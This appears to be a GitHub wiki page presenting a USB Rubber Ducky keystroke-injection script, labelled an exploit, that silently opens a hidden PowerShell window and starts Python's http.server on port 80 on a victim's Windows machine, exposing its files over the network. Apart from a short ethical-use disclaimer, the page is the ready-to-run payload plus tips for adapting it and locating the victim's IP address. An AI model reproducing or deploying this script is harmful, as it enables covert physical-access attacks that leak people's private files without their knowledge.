Skip to content

Python HTTP Server exploit

Jump to bottom
Guereak edited this page Jan 30, 2022 · 2 revisions

/!\ ETHICAL USE ONLY: I am not responsible in any way for the use you make of this payload. Make sure to only use this on someone if you have their permission, or use on your own devices.

This ducky script takes advantage of the http.server module integrated with python3.

Only works if the victim is on the same network or has a public ip address.

(To obtain ip address of someone in the same network as yours, type ipconfig on the victim's windows terminal, or use an alternative method like nmap)

Use :

This payload is pretty simple as it essentially relies on a single line of code.

  • If this isn't working for you, your victim likely doesn't have python3 installed. Replacing the 'python3' keyword by 'python' in the script below might fix this issue in some cases.

Ducky code :


REM Author: Guereak
REM /!\ ETHICAL USE ONLY
REM Python HTTP server exploit
REM Only works if the user has Python installed
DELAY 300
GUI r
DELAY 100
STRING powershell -w hidden python3 -m http.server 80
DELAY 100
ENTER
REM you may want to replace 'python3' with 'python' depending on the victim's configuration

Clone this wiki locally